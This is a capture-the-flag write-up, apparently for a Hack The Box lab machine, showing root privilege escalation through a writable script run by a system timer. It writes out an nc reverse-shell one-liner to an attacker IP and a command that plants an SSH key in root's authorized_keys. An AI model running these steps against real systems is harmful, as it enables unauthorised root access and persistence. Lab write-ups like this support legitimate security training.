System Timer
I discovered that there is a system timer running with an interval of 10 seconds, executing a bash script located at /usr/bin/timer_backup.sh
The current user, pericles, has ownership over the script, granting a complete control over the file
I will escalate privileges to the root user by overwriting a simple reverse shell to the bash script to have the system timer execute it.
File Overwrite
pericles@time:/$ echo 'mkfifo /tmp/ssllzqc; nc 10.10.14.7 1234 0</tmp/ssllzqc | /bin/sh >/tmp/ssllzqc 2>&1; rm /tmp/ssllzqc' >> /usr/bin/timer_backup.shOverwriting to the bash script by appending a reverse shell at the end of the file
It’s done. Now, I just need to wait 10 seconds
┌──(kali㉿kali)-[~/archive/htb/labs/time]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.214] 40978I got the shell connection but it got cut off immediately for some reason
pericles@time:/$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zipChecking the bash script reveals that the change that I made has been revoked. This tells me that there is likely a cronjob reverting the bash script back to its original state. I would have to be quick or do something else
SSH
Since the presumed cronjob messing with the system timer, I could just write my SSH key into the SSH file of the root user
pericles@time:/$ echo 'echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali" >> /root/.ssh/authorized_keys' >> /usr/bin/timer_backup.shThis should put my SSH key into the SSH file of the root user
pericles@time:/$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali" >> /root/.ssh/authorized_keysAll set.
Now I should be able to just SSH into the target system as the root user, using my own SSH key
┌──(kali㉿kali)-[~/archive/htb/labs/time]
└─$ ssh root@$IP -i ./id_rsa.root
warning: Identity file ./id_rsa.root not accessible: No such file or directory.
enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-52-generic x86_64)
* documentation: https://help.ubuntu.com
* management: https://landscape.canonical.com
* support: https://ubuntu.com/advantage
system information as of tue 21 mar 2023 02:30:01 PM UTC
system load: 1.38
usage of /: 63.1% of 7.75GB
memory usage: 28%
swap usage: 0%
processes: 248
users logged in: 0
ipv4 address for ens160: 10.10.10.214
ipv6 address for ens160: dead:beef::250:56ff:feb9:759a
168 updates can be installed immediately.
47 of these updates are security updates.
to see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
to check for new updates run: sudo apt update
last login: Thu Dec 16 14:58:37 2021
root@time:~# whoami
root
root@time:~# hostname
time
root@time:~# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.214 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:759a prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:759a prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:75:9a txqueuelen 1000 (Ethernet)
RX packets 144431 bytes 17732158 (17.7 MB)
RX errors 0 dropped 26 overruns 0 frame 0
TX packets 139752 bytes 10876641 (10.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 32326 bytes 2296766 (2.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 32326 bytes 2296766 (2.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise